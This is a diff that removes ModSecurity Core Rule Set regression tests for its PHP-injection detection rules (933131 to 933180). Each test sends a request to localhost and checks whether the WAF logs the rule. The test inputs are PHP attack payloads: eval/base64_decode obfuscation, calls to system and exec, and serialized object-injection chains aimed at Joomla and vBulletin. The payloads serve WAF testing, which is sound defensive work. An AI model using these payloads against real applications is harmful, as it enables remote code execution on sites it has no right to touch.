description: Tests functionality of stricter sibling 933131
enabled: true
name: 933131.yaml
tests:
- test_title: 933131-1
desc: SERVER request URLEncoded
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=$_%53ERVER['test'];
output:
no_log_contains: id "933131"
- test_title: 933131-2
desc: SERVER request URLEncoded
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?%24_COOKIE=value;
output:
no_log_contains: id "933131"
- test_title: 933131-3
desc: SERVER index listed with obfuscated SERVER
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=$_%53%20ERVER['REQUEST_URI'];
output:
log_contains: id "933131"

22
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml vendored
View file

@ -1,22 +0,0 @@
---
meta:
author: "Christian S.J. Peron"
description: None
enabled: true
name: 933140.yaml
tests:
- test_title: 933140-1
desc: "PHP Injection Attack: I/O Stream"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: "localhost"
Cache-Control: "no-cache, no-store, must-revalidate"
method: POST
port: 80
data: "var=php://stdout"
version: HTTP/1.0
output:
log_contains: id "933140"

223
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml vendored
View file

@ -1,223 +0,0 @@
---
meta:
author: lifeforms
description: None
enabled: true
name: 933150.yaml
tests:
- test_title: 933150-1
desc: pmf
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /base64_decode
output:
log_contains: id "933150"
- test_title: 933150-2
desc: base64_decode
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /base64_decode
output:
log_contains: id "933150"
- test_title: 933150-3
desc: base64_decode
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?base64_deCOde
output:
log_contains: id "933150"
- test_title: 933150-4
desc: base64_decode
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?foo=bzdecomprEss
output:
log_contains: id "933150"
- test_title: 933150-5
desc: base64_decode
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?foo=FOOcall_user_func
output:
log_contains: id "933150"
- test_title: 933150-6
desc: fsockopen
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?foo=FOOcall_user_func
output:
log_contains: id "933150"
- test_title: 933150-7
desc: gzdecode
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?foo=FOOcall_user_func
output:
log_contains: id "933150"
- test_title: 933150-8
desc: GzInFlAtE
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?foo=FOOcall_user_func
output:
log_contains: id "933150"
- test_title: 933150-9
desc: GzInFlAtE
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?foo=FOOcall_user_func
output:
log_contains: id "933150"
- test_title: 933150-10
desc: GzInFlAtE
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?I%20don%27t%20like%20gzuncompress
output:
log_contains: id "933150"
- test_title: 933150-11
desc: GzInFlAtE
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?bar=pfsockopen%28%27foo%27%2C%2025%29
output:
log_contains: id "933150"
- test_title: 933150-12
desc: posix_getpwuiD
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?bar=pfsockopen%28%27foo%27%2C%2025%29
output:
log_contains: id "933150"
- test_title: 933150-13
desc: posix_getpwuiD
stages:
- stage:
input:
data: Shell%5fexec=bla
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /
output:
log_contains: id "933150"
- test_title: 933150-14
desc: ZlIb_DeCoDe
stages:
- stage:
input:
data: Shell%5fexec=bla
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /
output:
log_contains: id "933150"
- test_title: 933150-15
desc: get_defined_functions
stages:
- stage:
input:
data: foo=get_defined_functions%28%29%5B0%5D
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /
output:
log_contains: id "933150"
- test_title: 933150-16
desc: get_defined_vars
stages:
- stage:
input:
data: foo=get_defined_vars%28%29%5B0%5D
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /
output:
log_contains: id "933150"

81
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml vendored
View file

@ -1,81 +0,0 @@
---
meta:
author: lifeforms
description: None
enabled: true
name: 933151.yaml
tests:
- test_title: 933151-1
desc: pmf + chain; must run test in PL2!
stages:
- stage:
input:
data: x=Print_r%28%20%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /array_diff%20foo%20%28
output:
log_contains: id "933151"
- test_title: 933151-2
desc: pmf + chain; must run test in PL2!
stages:
- stage:
input:
data: x=Print_r%28%20%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?date_ADD%28%29
output:
log_contains: id "933151"
- test_title: 933151-3
desc: non-dangorous PHP functions, removed to reduce FP
stages:
- stage:
input:
data: x=Print_r%28%20%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=filemtime%28%24foo%29
output:
no_log_contains: id "933151"
- test_title: 933151-4
desc: pmf + chain; must run test in PL2!
stages:
- stage:
input:
data: gethostbynamE(
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /gethost
output:
log_contains: id "933151"
- test_title: 933151-5
desc: No peren after keyword
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=array_diff
output:
no_log_contains: id "933151"

592
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml vendored
View file

@ -1,592 +0,0 @@
---
meta:
author: lifeforms
description: None
enabled: true
name: 933160.yaml
tests:
- test_title: 933160-1
desc: function call regexp
stages:
- stage:
input:
data: Shell%5fexec=bla
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=chr%28123%29
output:
log_contains: id "933160"
- test_title: 933160-2
desc: function call regexp
stages:
- stage:
input:
data: foo=curl_iNit%28%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /
output:
log_contains: id "933160"
- test_title: 933160-3
desc: function call regexp
stages:
- stage:
input:
data: eval($foo)
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /
output:
log_contains: id "933160"
- test_title: 933160-4
desc: function call regexp
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /
output:
log_contains: id "933160"
- test_title: 933160-5
desc: function call regexp
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=exec%0A%28%27bar%27%29
output:
log_contains: id "933160"
- test_title: 933160-6
desc: function call regexp
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=FILE%0D%0A%28%29
output:
log_contains: id "933160"
- test_title: 933160-7
desc: function call regexp
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=file_ExistS%20%28%0A%0A%29
output:
log_contains: id "933160"
- test_title: 933160-8
desc: function call regexp
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=fopen%20%20%28blah%29
output:
log_contains: id "933160"
- test_title: 933160-9
desc: '@ operator'
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=fopen%20%20%28blah%29
output:
log_contains: id "933160"
- test_title: 933160-10
desc: func\t()
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=fopen%20%20%28blah%29
output:
log_contains: id "933160"
- test_title: 933160-11
desc: func//comment\r\n ()
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=fopen%20%20%28blah%29
output:
log_contains: id "933160"
- test_title: 933160-12
desc: 'func #comment\n ()'
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=fopen%20%20%28blah%29
output:
log_contains: id "933160"
- test_title: 933160-13
desc: func#\n ()
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=fopen%20%20%28blah%29
output:
log_contains: id "933160"
- test_title: 933160-14
desc: 'func \t #\n ()'
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=fopen%20%20%28blah%29
output:
log_contains: id "933160"
- test_title: 933160-15
desc: func/*comment*/()
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=fopen%20%20%28blah%29
output:
log_contains: id "933160"
- test_title: 933160-16
desc: func /*com*/ ()
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=fopen%20%20%28blah%29
output:
log_contains: id "933160"
- test_title: 933160-17
desc: func \t/**/\t ()
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=fopen%20%20%28blah%29
output:
log_contains: id "933160"
- test_title: 933160-18
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=fopen%20%20%28blah%29
output:
log_contains: id "933160"
- test_title: 933160-19
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /strrev()
output:
log_contains: id "933160"
- test_title: 933160-20
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /strREV%28%24x%29
output:
log_contains: id "933160"
- test_title: 933160-21
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: ?x=eval%28chr%28112%29.chr%28104%29.chr%28112%29
output:
log_contains: id "933160"
- test_title: 933160-22
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /eval(gzinflate(str_rot13(base64_decode("")
output:
log_contains: id "933160"
- test_title: 933160-23
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /eval%28base64_decode%28%27JGNoZWNrID...
output:
log_contains: id "933160"
- test_title: 933160-24
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: yt=eval%28%22echo+10000000000%2d245205634%3b%22%29%3b
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /
output:
log_contains: id "933160"
- test_title: 933160-25
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: posix_getegid%28%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /getegid
output:
log_contains: id "933160"
- test_title: 933160-26
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: x=Print_r%28%20%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /print_r
output:
log_contains: id "933160"
- test_title: 933160-27
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: x=Print_r%28%20%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /astrrev()
output:
log_contains: id "933160"
- test_title: 933160-28
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: x=Print_r%28%20%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /strrev
output:
log_contains: id "933160"
- test_title: 933160-29
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: x=Print_r%28%20%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /strrev(
output:
log_contains: id "933160"
- test_title: 933160-30
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: x=Print_r%28%20%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=eval
output:
log_contains: id "933160"
- test_title: 933160-31
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: x=Print_r%28%20%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=the%20files%20%28yep%29
output:
log_contains: id "933160"
- test_title: 933160-32
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: x=Print_r%28%20%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=exec%20%28
output:
log_contains: id "933160"
- test_title: 933160-33
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: x=Print_r%28%20%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=executor%28%29
output:
log_contains: id "933160"
- test_title: 933160-34
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: x=Print_r%28%20%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=cheval%28%24foo%29
output:
log_contains: id "933160"
- test_title: 933160-35
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: x=Print_r%28%20%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=audi%6ffile%28%24foo%29
output:
log_contains: id "933160"
- test_title: 933160-36
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: x=Print_r%28%20%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=the%20system%20is%20down%28%29
output:
log_contains: id "933160"
- test_title: 933160-37
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: x=Print_r%28%20%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=ecosystem%28%29
output:
log_contains: id "933160"
- test_title: 933160-38
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: x=Print_r%28%20%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=systems%28%29
output:
log_contains: id "933160"
- test_title: 933160-39
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: x=Print_r%28%20%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=system%20something%28%29
output:
log_contains: id "933160"

82
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml vendored
View file

@ -1,82 +0,0 @@
---
meta:
author: lifeforms
description: None
enabled: true
name: 933161.yaml
tests:
- test_title: 933161-1
desc: regexp; must run test in PL3!
stages:
- stage:
input:
data: gethostbynamE(
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?%20checkDate%28%29
output:
log_contains: id "933161"
- test_title: 933161-2
desc: regexp; must run test in PL3!
stages:
- stage:
input:
data: gethostbynamE(
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=chroot%09%28%29
output:
log_contains: id "933161"
- test_title: 933161-3
desc: symlink \t()
stages:
- stage:
input:
data: gethostbynamE(
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=chroot%09%28%29
output:
log_contains: id "933161"
- test_title: 933161-4
desc: dl/*foo*/()
stages:
- stage:
input:
data: gethostbynamE(
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=chroot%09%28%29
output:
log_contains: id "933161"
- test_title: 933161-5
desc: dl/*foo*/()
stages:
- stage:
input:
data: gethostbynamE(
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=xucfirst%28%29
output:
no_log_contains: id "933161"

153
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml vendored
View file

@ -1,153 +0,0 @@
---
meta:
author: lifeforms
description: None
enabled: true
name: 933170.yaml
tests:
- test_title: 933170-1
desc: PHP object injection
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /serialize0?foo=O%3A8%3A%22stdClass%22%3A0%3A%7B%7D
output:
log_contains: id "933170"
- test_title: 933170-2
desc: PHP object injection
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /serialize1?foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D
output:
log_contains: id "933170"
- test_title: 933170-3
desc: PHP object injection
stages:
- stage:
input:
data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /serialize2
output:
log_contains: id "933170"
- test_title: 933170-4
desc: PHP object injection
stages:
- stage:
input:
data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /serialize3?foo=O%3A21%3A%22JDatabaseDriverMysqli%22%3A3%3A%7Bs%3A2%3A%22fc%22%3BO%3A17%3A%22JSimplepieFactory%22%3A0%3A%7B%7Ds%3A21%3A%22%5C0%5C0%5C0disconnectHandlers%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BO%3A9%3A%22SimplePie%22%3A5%3A%7Bs%3A8%3A%22sanitize%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7Ds%3A8%3A%22feed_url%22%3Bs%3A119%3A%22eval%28chr%28112%29.chr%28104%29.chr%28112%29.chr%28105%29.chr%28110%29.chr%28102%29.chr%28111%29.chr%2840%29.chr%2841%29.chr%2859%29%29%3BJFactory%3A%3AgetConfig%28%29%3Bexit%22%3Bs%3A19%3A%22cache_name_function%22%3Bs%3A6%3A%22assert%22%3Bs%3A5%3A%22cache%22%3Bb%3A1%3Bs%3A11%3A%22cache_class%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7D%7Di%3A1%3Bs%3A4%3A%22init%22%3B%7D%7Ds%3A13%3A%22%5C0%5C0%5C0connection%22%3Bb%3A1%3B%7D
output:
log_contains: id "933170"
- test_title: 933170-5
desc: PHP object injection
stages:
- stage:
input:
data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /serialize4/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D
output:
log_contains: id "933170"
- test_title: 933170-6
desc: PHP object injection
stages:
- stage:
input:
data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /serialize5?O%3A8%3A%22stdClass%22%3A4%3A%7Bs%3A3%3A%22aaa%22%3Ba%3A5%3A%7Bi%3A0%3Bi%3A1%3Bi%3A1%3Bi%3A2%3Bi%3A2%3Ba%3A1%3A%7Bi%3A0%3Bi%3A1%3B%7Di%3A3%3Bi%3A4%3Bi%3A4%3Bi%3A5%3B%7Ds%3A3%3A%22aaa%22%3Bi%3A1%3Bs%3A3%3A%22ccc%22%3BR%3A5%3Bs%3A3%3A%22ddd%22%3Bs%3A4%3A%22AAAA%22%3B%7D
output:
log_contains: id "933170"
- test_title: 933170-7
desc: PHP object injection
stages:
- stage:
input:
data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /serialize6
output:
log_contains: id "933170"
- test_title: 933170-8
desc: PHP object injection
stages:
- stage:
input:
data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /serialize7
output:
log_contains: id "933170"
- test_title: 933170-9
desc: PHP object injection
stages:
- stage:
input:
data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /serialize8
output:
log_contains: id "933170"
- test_title: 933170-10
desc: PHP object injection
stages:
- stage:
input:
data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /serialize9
output:
log_contains: id "933170"

494
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml vendored
View file

@ -1,494 +0,0 @@
---
meta:
author: lifeforms
description: None
enabled: true
name: 933180.yaml
tests:
- test_title: 933180-1
desc: PHP variable functions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=
output:
no_log_contains: id "933180"
- test_title: 933180-2
desc: $a(1)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: 'foo=%24a%281%29'
output:
log_contains: id "933180"
- test_title: 933180-3
desc: $$b(2)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: 'foo=%24%24b%282%29'
output:
log_contains: id "933180"
- test_title: 933180-4
desc: $_(3)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: 'foo=%24_%283%29'
output:
log_contains: id "933180"
- test_title: 933180-5
desc: '@$__[o](4)'
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: 'foo=%40%24__%5Bo%5D%284%29'
output:
log_contains: id "933180"
- test_title: 933180-6
desc: $__['o'](5)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: 'foo=%24__%5B%27o%27%5D%285%29'
output:
log_contains: id "933180"
- test_title: 933180-7
desc: $__[@o](6)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: 'foo=%24__%5B%40o%5D%286%29'
output:
log_contains: id "933180"
- test_title: 933180-8
desc: $__[$_[1]](7)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: 'foo=%24__%5B%24_%5B1%5D%5D%287%29'
output:
log_contains: id "933180"
- test_title: 933180-9
desc: $__[@$c](8)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: 'foo=%24__%5B%40%24c%5D%288%29'
output:
log_contains: id "933180"
- test_title: 933180-10
desc: $d['o'](9)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: '%24d%5B%27o%27%5D%289%29'
output:
log_contains: id "933180"
- test_title: 933180-11
desc: ${@a}(10)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: 'foo=%24%7B%40a%7D%2810%29'
output:
log_contains: id "933180"
- test_title: 933180-12
desc: ${'a'}(11)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: '/?foo=%24%7B%27a%27%7D%2811%29'
output:
log_contains: id "933180"
- test_title: 933180-13
desc: ${@$b}(12)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: '/?x=%24%7B%40%24b%7D%2812%29'
output:
log_contains: id "933180"
- test_title: 933180-14
desc: ${$s20}['q53b3a6'](13)
stages:
- stage:
input:
